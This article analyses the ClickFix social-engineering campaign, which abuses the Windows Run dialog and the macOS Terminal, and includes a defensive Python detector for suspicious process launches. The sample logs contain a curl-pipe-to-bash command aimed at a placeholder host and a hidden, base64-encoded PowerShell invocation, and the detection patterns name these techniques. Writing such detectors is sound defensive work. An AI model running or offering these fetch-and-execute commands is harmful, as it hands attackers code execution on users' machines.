
New ClickFix Attack Exploits Windows Run Dialog and macOS Terminal to Deploy Malware
Why It Matters
ClickFix shifts the attack surface from browsers to trusted OS tools, making detection harder and exposing organizations that allow unrestricted command execution to high‑risk compromise.
Key Takeaways
- ClickFix exploits native OS utilities, bypassing browser defenses
- Five clusters impersonate QuickBooks, Booking.com, Zillow, etc.
- Payloads run in memory, leaving minimal forensic artifacts
- Obfuscated PowerShell and curl commands evade endpoint controls
- Mitigations require policy hardening of Run, PowerShell, Terminal
Pulse Analysis
The rise of ClickFix reflects a broader shift in cyber‑crime toward living‑off‑the‑land techniques that weaponize trusted system binaries. By coercing users to copy‑paste commands into Windows Run, PowerShell, or macOS Terminal, attackers sidestep browser sandboxing and exploit the inherent trust placed in native utilities. This approach reduces reliance on zero‑day exploits and enables rapid campaign redeployment on fresh domains, as seen in the five clusters tracked since 2024. For defenders, the challenge lies in distinguishing legitimate administrative actions from malicious prompts that appear as routine verification steps.
From a defensive standpoint, traditional indicator‑based blocking is insufficient against ClickFix. The attacks leverage heavily encoded strings that are decoded at runtime, and the final payloads execute entirely in memory, leaving scant disk evidence. Organizations should therefore adopt behavioral controls: enforce PowerShell Constrained Language Mode, apply AppLocker or Windows Defender Application Control policies to restrict script execution, and implement MDM‑driven restrictions on macOS Terminal usage. Continuous monitoring of HTML content hashes, DOM signatures, and brand‑specific image assets—capabilities offered by platforms like Recorded Future—can surface new ClickFix domains before they reach end users.
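The behavioural controls above hinge on what runs and which process launched it, not on which domain served the lure. As an added illustration (not code from the article or from Recorded Future), the Python below applies that idea to a handful of constructed process-creation log lines: it flags a PowerShell child of explorer.exe (the process that hosts the Run dialog), abbreviated or full -EncodedCommand arguments, hidden-window flags, and curl-piped-to-shell invocations on macOS, and it decodes the base64 so an analyst can read what an encoded string actually ran. The log format, host names, paths and the harmless encoded payload are all constructed for this example.

```python
import base64
import re

# Constructed, harmless payload encoded the way PowerShell's -EncodedCommand
# expects it (UTF-16LE text, then base64). Not a real campaign artifact.
SAMPLE_ENCODED = base64.b64encode("Write-Host 'hi'".encode("utf-16-le")).decode("ascii")

# Constructed process-creation records (Sysmon event 1 style, simplified).
SAMPLE_LOGS = [
    # Windows: explorer.exe (Run dialog host) launching a hidden, encoded PowerShell command
    f'host=WS01 parent=C:\\Windows\\explorer.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    f'cmdline="powershell.exe -NoP -W Hidden -Enc {SAMPLE_ENCODED}"',
    # Windows: routine admin script started by the service host (scheduled task)
    'host=WS02 parent=C:\\Windows\\System32\\svchost.exe image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'cmdline="powershell.exe -File C:\\Scripts\\inventory.ps1"',
    # macOS: Terminal running curl piped straight into a shell
    "host=MAC01 parent=/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal image=/bin/bash "
    "cmdline=\"bash -c 'curl -fsSL https://example.invalid/verify | bash'\"",
    # macOS: ordinary curl download to a file
    'host=MAC02 parent=/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal image=/usr/bin/curl '
    'cmdline="curl -o report.pdf https://example.invalid/report.pdf"',
]

LOG_RE = re.compile(r'host=(?P<host>\S+) parent=(?P<parent>\S+) image=(?P<image>\S+) cmdline="(?P<cmdline>.*)"$')
# PowerShell accepts unambiguous prefixes of -EncodedCommand, so match the common short forms too.
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
HIDDEN_RE = re.compile(r"(?i)(?:^|\s)-w(?:indowstyle)?\s+hidden\b")
CURL_PIPE_RE = re.compile(r"(?i)\b(?:curl|wget)\b[^|]*\|\s*(?:sudo\s+)?(?:ba|z|da)?sh\b")
WINDOWS_SHELLS = {"powershell.exe", "pwsh.exe"}


def basename(path: str) -> str:
    """Last path component, accepting both Windows and POSIX separators."""
    return re.split(r"[\\/]", path)[-1].lower()


def parse_log_line(line: str):
    """Turn one constructed log line into a dict, or None if it does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def decode_encoded_command(b64: str):
    """Decode a -EncodedCommand argument (base64 of UTF-16LE); None if it is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: dict) -> dict:
    """Apply the behavioural checks to one event and return the reasons that fired."""
    reasons = []
    decoded = None
    image = basename(event["image"])
    parent = basename(event["parent"])
    cmd = event["cmdline"]
    # The Run dialog is hosted by explorer.exe, so a shell whose parent is explorer.exe
    # (rather than a terminal, the task scheduler or a management agent) is worth a look.
    if image in WINDOWS_SHELLS and parent == "explorer.exe":
        reasons.append("shell_from_explorer")
    m = ENC_RE.search(cmd)
    if m:
        reasons.append("encoded_command")
        decoded = decode_encoded_command(m.group(1))
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden_window")
    if CURL_PIPE_RE.search(cmd):
        reasons.append("curl_pipe_shell")
    return {"host": event["host"], "reasons": reasons, "decoded": decoded, "cmdline": cmd}


def scan(lines) -> list:
    """Return a finding for every parseable line on which at least one check fired."""
    findings = []
    for line in lines:
        event = parse_log_line(line)
        if event is None:
            continue
        result = analyze(event)
        if result["reasons"]:
            findings.append(result)
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOGS):
        print(f["host"], ",".join(f["reasons"]))
        if f["decoded"] is not None:
            print("  decoded:", f["decoded"])
```

Run as-is it reports WS01 (shell_from_explorer, encoded_command, hidden_window, with the decoded text) and MAC01 (curl_pipe_shell) and stays silent on the two benign lines. The parent-process and flag checks are the kind of rule that survives a campaign moving to a fresh domain, which is exactly where hash- and domain-based blocking falls short; tune the parent list to whatever legitimately launches shells in your environment before relying on it for alerting.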
Looking ahead, the persistence of ClickFix is tied to the prevalence of unrestricted command‑line access in corporate environments. As attackers incorporate browser fingerprinting and adaptive lures, the social‑engineering component will become increasingly sophisticated, demanding robust user education alongside technical safeguards. Enterprises that proactively harden native shells, integrate real‑time threat intelligence, and conduct regular phishing simulations will be better positioned to neutralize this low‑complexity, high‑return vector that is set to dominate initial‑access tactics through 2026.